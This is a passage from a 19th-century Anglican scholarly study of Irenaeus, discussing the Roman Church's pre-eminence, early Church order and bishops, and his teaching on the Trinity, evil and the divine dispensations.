know that the ancient translator of Irenæus uses to signify ἀρχή141.
Putting these two together, Griesbach [pg 065] has rendered
κρείττονα ἀρχὴν, potiorem initium, and thus got rid of the idea of
authority altogether. But there is no need of this. Principalis is used
by the translator as the rendering of ἡγεμονικός142; principaliter, of
προηγουμένως143, and προηγητίκως144; principalitatem habeo, of
πρωτεύω145. We know that all the apostolical sees had a kind of
principality or pre-eminence above the surrounding Churches; a
more powerful pre-eminence than other Churches equally ancient
with themselves. Nay, we know that the Church of Rome had at that
time, in point of fact, a more powerful pre-eminence than any other
Church.

The next word to be considered is convenire, which may be

rendered either resort or agree; and I confess I should have been
disposed, with Massuet, to render it agree, were it not for a perfectly
parallel passage in the 32d Oration of Gregory of Nazianzum,
delivered at the first council of Constantinople. Speaking of
Constantinople, he says, εἰς ἣν τὰ πανταχόθεν ἄκρα συντρέχει, καὶ
ὅθεν ἄρχεται ὡς ἐμπορίου κοινοῦ τῆς πίστεως. Here Constantinople
is spoken of then under the very same terms as Rome by Irenæus,
as the common repository of the faith: other parts of the Christian
world are said to [pg 066] be governed (ἄρχεται) by it; and distant
Churches are said to resort from all quarters: συντρέχει πανταχόθεν.
Are not these words an exact parallel to the convenire and undique
of the translator of Irenæus? I therefore feel bound to give
convenire the sense of resort. The next word to be noticed is
undique, the application of which is disputed; some, as Barrow146
and Faber147, applying it only to the immediate neighbourhood of
Rome, i. e. Italy and the adjacent parts of Gaul; others, and of
course the Romanists, to the whole Christian Church. According to
the former plan, the clause “hoc est ... fideles” is a limitation of the
expression “omnem ecclesiam,” confining it to the Churches
immediately surrounding Rome; and consequently the pre-eminence
of the Church of Rome would be equally narrowed by this
interpretation of undique. I am far from contending that this
interpretation is not correct; and the very fact of the passage
admitting it, without any force whatever, shows how little the papal
cause can be made to rest upon it. But as Gregory, in the parallel
[pg 067] passage I have quoted, uses the term πανταχόθεν, I am
disposed to take undique as its representative; the more especially
as we have seen that, whatever influence it gives to Rome, the
selfsame influence had Constantinople in an after age.

There are one or two more words still to be mentioned. Necesse est
is one of them. It may imply that it is the duty of every Church to
resort to Rome; but its more natural and usual meaning is, that, as a
matter of course, Christians from all parts, and not strictly the
Churches themselves, were led to resort thither by the superior
eminence of that Church.

I have hitherto taken this passage as though it must be applied

definitely to the Church of Rome. But this is by no means necessary;
for it may be a general observation applicable to all the most
eminent Churches, as may be seen by the following translation and
arrangement of it:—“For every Church, (that is, the faithful all
around,) must necessarily resort to that Church in which the
apostolical tradition has been preserved by those on all sides of it,
on account of its more powerful pre-eminence;” that is, Christians
must have recourse each to the most ancient and most eminent
Church in his neighbourhood. And this agrees with a passage of [pg
068] Tertullian148, in which he refers southern Greeks to Corinth,
northern to Philippi and Thessalonica, Asiatics to Ephesus, Italians
and Africans to Rome. The only objection which occurs to me lies in
the word hanc, which, if the passage is to be taken in this
application, must be translated that; but as it was in all probability
the representative of ταύτην, this word can scarcely present any
difficulty.

I will close this whole discussion with two remarks; first, that unless
we could recover the Greek text of this passage, it is plainly
impossible to ascertain its true sense; and secondly, that the
strongest sense we can attach to it, consistently with history, is, that
Christians of that period from all parts of Christendom must, if they
wish to ascertain traditions, have recourse to the Church of Rome,
because, as the first Church in Christendom, the common traditions
were preserved there by the resort of Christians from all quarters.
This twofold reason for resorting thither has long ceased to exist,
and consequently this passage of Irenæus can afford no support to
the claims of modern Rome, until it can be proved that those
portions of the Christian world which are not in communion with her
are no part of the Catholic Church.

[pg 069]
There is another subject which has caused much discussion, which is
adverted to by Irenæus, viz. the miraculous powers of the Church.
He declares that in his time powers of this kind were possessed by
Christians, such as raising the dead149, and casting out devils, and
healing the sick; that they likewise had the gift of prophecy150, and
spoke with tongues, and [pg 070] revealed secret things of men and
mysteries of God151. It is well known that Gibbon and Middleton have
thrown doubt upon the miraculous powers of the primitive Church;
and one of their chief arguments is that the early writers, such as
Irenæus, content themselves with general statements, but bring no
specific instance. The subject has been very fully entered into by the
present highly learned and amiable bishop of Lincoln, Dr. Kaye, in his
work on Tertullian152; and in the general I am disposed to acquiesce
in the theory adopted by the bishop, that those powers were
conferred only by apostolical hands, and that of course they would
continue till all that generation was extinct who were contemporary
with St. John, the last of the Apostles. That would admit of Irenæus
having known instances; and not having any idea that the power
was to be extinct, he would think that it still remained, even if he
had not known any recent instances. It is necessary to remark,
however, that he speaks of the gifts of tongues and the revealing of
secrets and mysteries, not as a thing coming under his own
knowledge, but heard of from others; and it does not appear that he
intends to say that they continued to his own time. And I will
venture to observe that it appears rather unfair to Irenæus to set
[pg 071] aside his testimony by saying that he brings no specific
instance of those things which he speaks of as still done. He might
feel that the thing was so notorious, that those who were not
convinced by the notoriety of such occurrences would cavil at any
particular case he might select; and his mentioning that some of
those who had been delivered from evil spirits had become converts,
that some of those who had been raised from the dead, being poor,
had been assisted with money153, and that some had lived many
years after154, surely indicates that he was speaking from a
knowledge of individual cases. One should indeed have expected
that every one who owed his deliverance from Satanic possession to
the miraculous power possessed by Christians would have embraced
the faith of those who exercised it; and the circumstance that
Irenæus affirms this of some only gives a greater air of probability to
his whole statement. Besides this, we must distinguish between the
cases of persons healed by the direct agency of an individual, and
those in which it pleased God to hear the joint prayers of several; for
it is observable that our author attributes the raising of the dead
only to [pg 072] the united prayers and fasting of a whole Church,
and confines it to cases of great urgency155.

The testimony which Irenæus bears to the relation between the

Church and the empire is but slight. He mentions a Christian as
having been in his own youth high in the imperial court, at the same
time that he was a follower or admirer of Polycarp156; he speaks of
Christians in the imperial palace deriving an income from the
heathen, and able to assist their poorer brethren157; and he
acknowledges the general advantages which Christians derived from
the supremacy of the Romans, in common with their other subjects,
in the prevalence of peace and the freedom from individual
outrage158. But he mentions very distinctly the persecutions at
another time Christians suffered (particularly alluding to those which
took place at Lyons), and notices that slaves were compelled to
inform against their masters; and that in this way the calumny that
Christians fed upon human flesh arose, from a misunderstanding of
the nature of the holy Eucharist159; the slaves having heard their [pg
073] masters speak of feeding on the body and blood of Christ, and
taking it in a literal sense.

[pg 074]
Chapter III. On The Nature, Office,
Powers, and Privileges Of The Church.

The proper aspect to view the Church in is a matter of so much

practical importance at all times, that it can never be uninteresting
to know the light in which it was regarded in the subapostolical age,
of which Irenæus is a very unobjectionable evidence.

We shall find then that this writer considered the Church to be an

ascertainable society, planted first at Jerusalem160, and thence
spread to the limits of the habitable globe161; planted by the
Apostles, and kept up by and in the elders or bishops their
successors162. It is, however, divided into separate Churches, which
are to regard that of Jerusalem as their mother [pg 075] Church163.
The whole Church, moreover, is to its individual members as a
mother to her children164: [pg 076] she is appointed for the
quickening of creation165, and in her is the way of life166, which those
who keep aloof from her do not possess167; in her is the Holy Spirit,
which is not to be found out of her168. She possesses the adoption
and inheritance of Abraham, and her members are consequently the
seed of Abraham169. Being thus appointed for the quickening of the
world, by being the way of life to its members, she has for that
purpose received the faith from the Apostles, which it is her business
to distribute to her children170. She is therefore the appointed
preacher of the faith, or the truth, which is not variable and [pg 077]
changeable, but one, and only one171; not merely a quality infused
into the heart, but a form of truths embodied or summed up in
words, and delivered to her members when they are initiated into
her172. Her ancient system is therefore the guide to truth173, and
those who wish to know it must have recourse to her, and be
brought up in her bosom174. Her testimony, moreover, is confirmed
by the Apostles and Prophets175, whose writings are kept in the
custody of her elders176, with which, moreover, those must [pg 078]
expect to be fed who come to her177. She has succeeded to the
office of the ancient Jewish Church of being the great witness of the
unity of the Godhead178.

To show that she is commissioned from above, she wrought

continual miracles for the good of the world by prayer and invocation
of the name of Jesus179; she even raised the dead by means of
fasting and prayer180; and she alone produced persons who sealed
their own sincerity and the truth of their faith by their blood181.

Finally, although not exempt from weakness, and [pg 079] capable
of losing whole members, she, as a body, remains imperishable182.

It is remarkable how strictly this notion of an external, visible,

ascertainable body, consisting of individuals, and under the
government of individual officers, having a personal succession in
distinct localities183, is in accordance with the doctrine of the Church
of England; and how totally opposed it is to the notions held
amongst dissenters, and by individuals within the Church in modern
times. According to Irenæus, moreover, the different classes of
sectaries would be regarded as having neither spiritual life nor the
Holy Spirit, except so far as they might be supposed to be in
communion with the body governed by elders or bishops descended
from the Apostles. If in any way or to any degree they can be
supposed to be in communion with them, to that extent they would
be thought to have the Holy Ghost, and to be in the way of life, but
no further. I am not now discussing whether he was right or wrong;
I am merely pointing out the contrariety between his views of the
Church and those which appear to be most popular at present. I
doubt if most Protestants would not pronounce his doctrine to be
gross [pg 080] bigotry; for very many of those who would go so far
with him as to acknowledge the Church to be a visible society, would
be very far from restricting the grace of the Holy Spirit to the
communion of the bishops in succession from the Apostles.

I must, however, direct more particular attention to one part of his

system which did not require to be brought out prominently. We
have seen that he thought it possible for the Church to lose whole
members. In fact, although he thought that the truth was kept up by
the succession of bishops throughout the Church, and that it was a
mark of truth to be so kept up, he still believed that presbyters or
bishops might, through pride, or other evil motives, make schisms in
the Church184; and he taught that those were to be adhered to who,
with the succession, [pg 081] keep the Apostles' doctrine, and lead
good lives185; implying, of course, that some who were in the
succession might depart from the Apostles' doctrine. The succession
was not, therefore, in his opinion, an infallible test of truth in the
individual Church. Any individual Church, or even a considerable
number or collection of Churches, might fall into heresy, and thus
become cut off from the Church; but it is evident that he did not
think this possible to happen to the great body of the Church.

It is manifest from this that he thought the private Christian must

sometimes pass judgment upon his bishop, and might be called
upon to separate from him, and to adhere to those who were more
orthodox. In what cases this was requisite, or what was to be the
extent of the alienation, he does not give any hint; but this clearly
establishes that he thought private judgment upon religious
controversy to be sometimes a duty: for without the exercise of
private judgment upon the part of the layman, it would be in some
cases impossible for him to show his preference for those bishops
who adhered to the Apostles' doctrine.

[pg 082]
We find no trace in Irenæus of any authority in the Church of Rome
to decide controversies for the rest of the Church. On the contrary,
he taught Christians to have recourse to any ancient apostolical
Church, or rather collection of Churches186, if they wished to
ascertain the traditional system of the Church. He indeed quotes that
Church as being in his time a more important witness to the truth
than any other individual Church, because, through the continual
concourse of Christians thither, in consequence of its more powerful
pre-eminence, the traditions of the universal Church were there
collected as it were into a focus187; but, as I have pointed out
elsewhere188, he recognises no authority in that Church to claim to
decide controversies. With him it is not any individual Church that is
commissioned to preserve the truth, not even the Church of
Jerusalem, which he calls the mother of all Churches (a title which
has been since arrogated by the Roman Church), but the Catholic
Church, truly so called, by the mouth of her pastors throughout the
world; for although he mentions the pre-eminence of the Church of
Rome in his day as a matter of fact, he does not [pg 083] state it to
be a matter of right; nor does he ground any thing upon it but the
further fact that it followed, of course, that Christians resorted to it
from all quarters, as they did afterwards to Constantinople. He gives
no hint as to the source of that pre-eminence, other than its having
been settled by the two Apostles St. Peter and St. Paul, and
honoured with being the scene of their martyrdom189. And his appeal
to it he builds, not on any authority residing in it, but upon the fact
that at that time the confluence from all parts of the Church caused
the tradition of the whole Church to be best preserved there, as was
afterwards the case at Constantinople, and has since been no
where. So that his appeal to Rome is not in fact an appeal to that
Church, but to the Church universal; and since Rome has ceased to
be the place of resort to the universal Church, the ground for
appealing to her has ceased likewise.

On the subject of the Bishops of the primitive Church several

questions have arisen, and it is of course highly desirable to know
whether Irenæus furnishes any evidence on either side of them. It is
not to be expected that we can discuss any of them fully by the aid
of any single writer; but such indications as we meet with may with
propriety be drawn out.
[pg 084]
That which first demands our notice is whether Bishops existed, as a
distinct order from Presbyters, from the beginning.

Now Irenæus does undoubtedly call the same persons by the name
of Bishops and Presbyters interchangeably. But it has been long ago
pointed out that the circumstance of the same name being borne by
persons holding two different offices, proves nothing. It is unsafe to
infer from the circumstance that bishops are called presbyters, or
presbyters bishops, that therefore there was not a permanent officer
set over the other presbyters, and endued with functions which they
could not exercise, although not at first distinguished by a specific
name.

On the other hand, we learn from him that there were to be found in
every part of the Christian world bishops or presbyters placed at the
head of Churches, which from their importance, must have had
other presbyters in them, and which we know from other sources to
have had other presbyters in them; that there was only one of these
at one and the same time; that they were intrusted with the
government of the Churches, and called the Bishops of those
Churches; that the authority of the office was handed down from
individual to individual; and that the individuals who filled this office,
and by consequence [pg 085] the office itself, were appointed by
inspired apostles190. All these facts are irreconcileable with the
hypothesis that all presbyters were equal in authority and function.

The question whether these bishops and presbyters might not have
been simply pastors of independent congregations, is answered by
finding that they had other presbyters under them, (as Irenæus
under Pothinus, and Florinus and Blastus under the Bishops of
Rome,) and that in places such as Rome, where there were probably
more congregations than one.

There is nothing in Irenæus to favour the idea that the subject-

presbyters were not properly clergymen; on the contrary, the letter
of the martyrs to Eleutherius would appear to speak of Irenæus as a
clergyman, when we at the same time know him to have been a
presbyter: and it does appear in the highest degree improbable that
the flourishing Church of Rome, which we know to have been the
place of residence of two Apostles at once, should have been left,
down to Irenæus's time, with only a single clergyman in it, which
must have been the case upon this theory; to say nothing of
Smyrna, which, according to the same scheme, must have [pg 086]
been left destitute of spiritual superintendence during Polycarp's visit
to Rome, which S. Irenæus has recorded.

But granting the existence of Bishops such as we have them now,

and their appointment by Apostles, another question arises, first
suggested, so far as we know, by S. Jerome, whether the powers
now exclusively reserved to Bishops, such as ordination and
government, were so exclusively delegated to them by the Apostles,
as that those powers exercised by other presbyters are invalid. The
question does not appear to have occurred to Irenæus: but we have
no hint in him of other presbyters having the same authority as the
bishops of the Churches; on the other hand, he expressly states that
the Apostles committed the Churches to the government and
teaching of individual bishops or presbyters in each, making them
their successors, and giving them their own office191. And the very
circumstance of their committing the Churches to those individuals
did (by what appears to me inevitable consequence) exclude all
others from the same place to which those individuals were
appointed, and constitute them an order by themselves. And that
the universal Church understood the appointment in that sense is
proved by the fact, recorded by Irenæus, that the succession of
authority [pg 087] was kept up in individuals down to his time; the
evident implication being that it was so in all Churches.

The evidence, therefore, supplied by Irenæus, although not enabling

us, by itself, to discuss the whole question fully, is in support of the
discipline of the Church of England, which refuses to recognize the
ordinations of any but bishops, properly so called, and having their
authority in succession from the Apostles192.

[pg 088]
Chapter IV. On The Doctrine of the Holy
Trinity.

The controversy which Irenæus carried on with the Gnostics being

directly and explicitly on the subject of the Divine Nature, led him to
treat distinctly of the divinity and humanity of Christ and his
incarnation, of the providential government of God, and his various
manifestations. He is thus led, almost of necessity, to enunciate the
doctrine of the Trinity in Unity in various aspects, but most especially
in regard to the twofold nature of Christ.

In direct reference to the doctrine of the Trinity in Unity, he

describes the agency of the three Persons in the creation of man;
the Father willing and commanding, the Son ministering and
forming, the Spirit sustaining and nourishing him193. So again he
declares that God made all things by his Word [pg 089] or Son, and
Wisdom or Spirit, using the terms personally; and that this was the
same thing as making them by himself194, because they are his
hands195. And again, in explaining God's dispensations in regard to
man, he affirms196 that God was seen under the Old Testament by
the Spirit of prophecy, that he was seen subsequently by means of
the Son, adoptively, [pg 090] i. e. adopting human nature into the
divine197, and that he will be seen in his character of Father in the
kingdom of heaven; and that in this way the Spirit in the Son
prepares man, and the Son brings him to the Father, and the Father
grants to him immortality: and so again in the work of man's
redemption198, the Spirit operates, the Son supplies, the Father
approves, and man is perfected to salvation. He likewise gives two
statements of the substance of the Creed, in which the three
Persons of the Trinity are spoken of in the same manner as in the
Nicene Creed, both of which will be given in a subsequent chapter.

These are all the passages, so far as I have been able to discover,
which speak of the three Persons of the most Holy Trinity together;
but the doctrine is implied throughout.

On the twofold nature of Christ, and especially on his divinity, he is

more full. Indeed it would take more space than I can spare to
introduce all the passages which bear upon the subject.

[pg 091]
Very near the beginning of his treatise, in rehearsing the faith of the
Church, he speaks of “Christ Jesus our Lord and God and Saviour
and King199;” further on he quotes many passages of Scripture to
show that he was spoken of absolutely and definitely as God and
Lord200, and asks the question, [pg 092] How would men be saved, if
He who wrought out their salvation upon earth was not God201?

He asserts that the Word was with God from everlasting202, and that
Jesus was the Son of God before the creation203, that no man knows
the mode of his [pg 093] generation204, and that God made all things
by his indefatigable Word, who is the Artificer of all things, and
sitteth upon the cherubim, and preserves all things205. He declares
that the Lord who spake to Abraham was the Son206, and that it was
the Word that appeared to Moses207.

This Divine Word, then, was united with his creature208, (which union
is expressed by the name Emmanuel209,) and humbled himself to
take upon him [pg 094] the infant state of man210, and thus having
become Son of man211, went through all the ages of man212, and
finally hung upon the cross213. He asserts, moreover, that although
the angels knew the Father solely by the revelation of the Son214,
and indeed all [pg 095] from the beginning have known God by the
Son215, so that the Father is the Son invisible, and the Son the Father
visible216, yet that the Son knew not the day of judgment217; and
that this was so ordered, that we may learn that the Father is above
all218, and that the Son ministers to the Father219: finally, that when
Jesus was tempted and suffered, the Word in him restrained his
energy220. But he declares likewise that Christ remained in the
bosom of the Father, even when upon earth221.

[pg 096]
These mysteries in the nature of Christ Irenæus does not attempt to
explain, fully holding the eternal and unchangeable Divinity of the
Son, even when made flesh, and his strict personal union with that
flesh, and at the same time asserting his subordination to the Father,
even in his divine nature; feeling that when we cannot discover the
reason of every thing, we should consider the immeasureable
difference between us and God222; that if we cannot explain earthly
things, we cannot expect to explain heavenly things, and that what
we cannot explain we must leave to God223; and in short that it [pg
097] is much better to know nothing but Christ crucified, than by
subtil inquiries to fall into impiety224.

This Jesus, then, who has been testified of by all things that he was
truly God and truly man225, being related to both God and man, and
thus having the indispensable qualification for his office, became the
Mediator between them226; he came in every dispensation, [pg 098]
and summed up all things in himself227. He was born about the forty-
first year of the reign of Augustus228; when not full thirty he was
baptized, but he did not begin to teach till past forty229. His ministry
extended through three passovers230, and [pg 099] he suffered on
the day of the passover231. He is our High Priest232; he gave his soul
for our souls, and his flesh for ours 233; his righteous flesh has
reconciled to God our sinful flesh 234; and he brings us into union
and communion with God235. He rose again in the flesh236, and in the
flesh he ascended into heaven, and [pg 100] will come again to
judgment237; and he introduces his Church into the kingdom of
heaven238.
Respecting the Holy Ghost, Irenæus declares that he was with God
before all created things239, and (as we have seen) that he was the
Wisdom of God, whose operation was the operation of God240; that
he is rightly called Lord241; and he affirms that the bread of eternal
life, which is the Word, is also the Spirit of the Father242. He speaks
of him as coming with power to give entrance unto life to all nations,
and to open to them the new Covenant, and as offering to the
Father on the day of Pentecost the first fruits of all nations243.

[pg 101]
He affirms that man, at his creation, had the image of God in the
flesh, the likeness in the soul by the communication of the Divine
Spirit244. He implies that, since the fall, man has lost the Spirit, and
consequently the life of his soul; he asserts that he remains carnal
until he recovers the Spirit of God245, and then he becomes again a
living soul, and has in him the seed of eternal life246; that the Spirit
[pg 102] we receive here is a pledge of a fuller portion247; and that
at the resurrection the souls and bodies of the just will be quickened
by the Spirit in union with them, and their bodies become spiritual
bodies248, and capable of immortality.

This is the substance of the doctrine of Irenæus on the Trinity, and it

will be seen that it is identical with that of the Church of England,
and that his way of carrying it out throws light on important
passages of Holy Writ; and if there had been nothing of interest to
us in this Treatise beyond these clear and direct testimonies to the
belief of the Church of that age on the fundamental doctrine of the
Gospel, we might well be glad that it was written and handed down
to our times.

[pg 103]
Chapter V. The Origin of Evil.

This being the subject out of which the Gnostic theories appear to
have arisen (there being so many attempts to account for it, without
in any wise bringing it into connexion with the Supreme Being), it
might, perhaps, have been expected that Irenæus should have
endeavoured to throw some light upon it. He has, however, taken a
much wiser course. He has altogether declined making it clear, and
thereby escaped the danger of inventing another heresy.

He grants, indeed, that there is sufficient ground for inquiring why

God has allowed evil and imperfection to exist; but he declares that
all things were intended by the Almighty to be created in the very
state and with the very qualities with which they were created249. He
will not allow that subsequent [pg 104] dispensations were really
intended to remedy the imperfections of prior ones, because that
would be to accuse God himself of not understanding at first the
effects of his works250.

He asserts, moreover, that supposing angels and men to have a

proper voluntary agency, to be endued with reason and the power of
examining and deciding upon examination, they must, in the very
nature of things, be capable of transgressing; and that, indeed,
otherwise excellence would not have been either pleasant or an
object of desire, because they would not have known its value,
neither would it have been capable of reward, or of being enjoyed
when attained; nor would intercourse with God have been valued,
because it would have come without any impulse, choice, care, or
endeavour of their own251. This is the only approach to a solution of
[pg 105] the difficulty which all the study of philosophers and divines
has ever discovered.

But when we come to inquire why some of God's creatures

transgressed, and some continued in obedience, this, he says, is a
mystery which God has reserved to himself, and which it is
presumption for us to inquire into; and that we ought to consider
what it has pleased him to reveal as a favour, and leave to him that
which he has not thought proper to make known252.

[pg 106]
He notwithstanding suggests this practical good arising out of the
existence of evil, that the love of God will be more earnestly
cherished for ever by those who have known by experience the evil
of sin, and have obtained their deliverance from it not without their
own exertion; and therefore that this may be regarded as a reason
why God permitted evil253.

The sobriety of these views is so obvious, that it appears

unnecessary to dwell further upon them.

[pg 107]
Chapter VI. The Evil Spirits.

Although Irenæus does not think proper to discuss the subject of the
origin of evil, properly so called, he speaks agreeably to the
Scriptures as to its introduction into this lower world, and in some
degree fills up their outline. Thus he describes Satan as having been
originally one of the angels who had power over the air254. He
attributes the beginning of his overt acts of rebellion to his envy
towards man255, because he had been made in the image of [pg
108] God, i. e. immortal256; whom through envy he stirred up to
rebellion likewise257, and that by falsehood258, [pg 109] putting on
the form of the serpent, that he might escape the eye of God259:
wherefore, although God had pity upon man, as having fallen
through weakness260, and because otherwise Satan would have
frustrated the Divine purpose261, he totally cut off from himself the
apostate angels262, and doomed them and their Prince to the eternal
fire263, which he had from the beginning prepared for obstinate
transgressors264, [pg 110] although he did not make known to them
at that time that their lot was irremediable265.

The next act of the apostate spirits was to mingle themselves with
human nature by carnal copulation with women, and thus to cause
the total corruption of the old world and its inhabitants
(notwithstanding the preaching of Enoch to these fallen spirits), and
consequently their destruction266.

[pg 111]
Irenæus makes none but very general allusions to the agency of the
fallen spirits from the fall of man till the coming of Christ. He
declares that, up to that time267, they had not ventured upon
blaspheming God; but that then, becoming aware that everlasting
fire was the appointed recompense of those who continued [pg 112]
in rebellion without repentance, they felt themselves already
condemned, and waxing desperate, charged all the sin of their
rebellion on their Maker, by inspiring the Gnostics with their impious
tenets268. It seems to be implied that sentence is not yet pronounced
upon the fallen angels269.

[pg 113]
Chapter VII. The Divine Dispensations.

After the introduction of evil into creation, and the agency by which
it is propagated in the world, we have next to notice the Divine plans
for its counteraction and removal; and as Irenæus was opposing the
Gnostic notion that the whole government of the world, prior to the
Gospel, was in the hands of beings adverse to the Supreme Being,
he was naturally led to show that, on the contrary, the whole history
of mankind has been a series of dispensations emanating from one
and the same Supreme and only God.

We have already270 seen him stating that the whole of these

dispensations were planned from the beginning; and he states them
to have been carried into execution by God the Son exhibiting
himself to mankind under four different aspects, figured by the [pg
114] four faces of the cherubim; first to the Patriarchs, in a kingly
and divine character; secondly, under the law, in a priestly and
sacrificial aspect; thirdly, at his nativity, as a man; fourthly, after his
ascension, by his Spirit271.

Again, he represents God as having made four covenants with

mankind; one with Noah, of which the rainbow was the sanction; a
second with Abraham, by circumcision; a third of the law, by Moses;
a fourth of the Gospel, by Christ272. At least this is [pg 115] the
enumeration made in the Questions and Answers of Anastasius, and
in the Theoria Rerum Ecclesiasticarum of Germanus, where the
Greek of Irenæus is transcribed, and from which it was first
published by Grabe. But the old Latin version makes a different
enumeration, reckoning the first covenant before the deluge with
Adam, and the second after that event with Noah273.
He thinks that the knowledge of God was kept up amongst the
patriarchs by tradition from Adam, and amongst the Jews by the
prophets; whilst in heathen nations the tradition has been lost, and
men are left to find it out by reason274: that human governments
were providentially ordained to restrain the ferocity and rapacity of
mankind after they had given up the fear of God275; that the law of
Moses was given [pg 116] by way of discipline, to recover the
Israelites back to that sense of justice, and responsibility, and feeling
of love to God and man which they had lost276; that [pg 117] the
prophets were inspired in order to accustom man by degrees to bear
God's Spirit and to have communion with him277: and thus in various
ways God prepared mankind for salvation, providing for them laws
suited to their various states of preparation.

In opposing the notions of the Gnostics, Irenæus had to defend the

position that the Old Testament is not contrary to the New; that they
both emanated from the same God acting differently under different
circumstances. The abolition of the law, he contended, was no proof
of a change of mind, but only of a change of circumstances; the law
being in its nature symbolical and preparatory, when the Gospel, the
reality and the end, was revealed, the office of the law ceased278.

[pg 118]
He distinguishes, however, between what he calls the natural
portions of the law and the rest. As they were kept by good men
before the law279, so he conceives them to be binding on us ever
since280. It [pg 119] is not at first sight clear what he means by that
term, but he expressly informs us that he comprises in it the whole
decalogue281. And yet there is every appearance that he would
exclude the fourth commandment, which he expressly asserts not to
have been observed before the giving of the law282.

But although the precepts of the moral law are equally binding at all
times, he thought that they were not formally given to the just men
of old, because they observed them voluntarily, being a law unto
themselves283. But when God's people forgot [pg 120] them in the
land of Egypt, then it became necessary distinctly to enact them, to
prepare man for the fuller duties of love to God and goodwill to
man284. And when they did not obey the moral law, he added to it
the ceremonial285, that, by types, their servile and childish natures
might be trained up to the apprehension of realities; by temporal
things, of eternal; by carnal, of spiritual; by earthly, of heavenly286.
Some of their ordinances had a twofold use; as circumcision was
intended, equally with their rites and ceremonies, to keep them
distinct from the heathen, and also to signify the circumcision of the
soul287.

[pg 121]
To show that the moral law was preparatory to the Gospel, he
alleges the fact that Jesus taught its precepts as the way of life to
the young lawyer who came to inquire of him; not supposing that
these were sufficient in themselves, but that they were steps to the
knowledge of Christ288.

He, however, thought that our Lord wished that the whole
ceremonial law should be observed as long as Jerusalem stood289.

But although he appears to think that the law, as a whole and in the
letter, is no longer binding to Christians, he does not think that this
leaves us at liberty to do as we like. If we are not tied down [pg
122] to the letter, like slaves, that is because it was intended that
the law of liberty should be of wider range, and our obedience
extend itself beyond the letter, and that our subjection to our
Heavenly King should be more hearty and thoroughgoing than ever;
and therefore, if we wish to remain in the way of salvation through
Christ, we must voluntarily adopt the precepts of the decalogue,
and, giving them a completer meaning, endeavour to realize in our
conduct all the fulness of their enlarged application290.

[pg 123]
It is almost unnecessary to point out the exact agreement of these
sentiments with the seventh and fourteenth articles of the Church of
England, and how impossible it must be for a person holding them
to think that we can do any thing whatever beyond what Christ has
a right to expect from us. It is manifest that he would not have
thought that any degrees of Christian holiness are really at our
option, whether we shall seek them or not; but that every person
who, having any degree of perfection, or any means of advancement
placed before him, knowingly neglects it, becomes thereby unworthy
of him who has given him liberty291, and hazards his salvation: in
short, that “to whom much is given, of him will much be required.”

[pg 124]
Welcome to our website – the perfect destination for book lovers and
knowledge seekers. We believe that every book holds a new world,
offering opportunities for learning, discovery, and personal growth.
That’s why we are dedicated to bringing you a diverse collection of
books, ranging from classic literature and specialized publications to
self-development guides and children's books.

More than just a book-buying platform, we strive to be a bridge

connecting you with timeless cultural and intellectual values. With an
elegant, user-friendly interface and a smart search system, you can
quickly find the books that best suit your interests. Additionally,
our special promotions and home delivery services help you save time
and fully enjoy the joy of reading.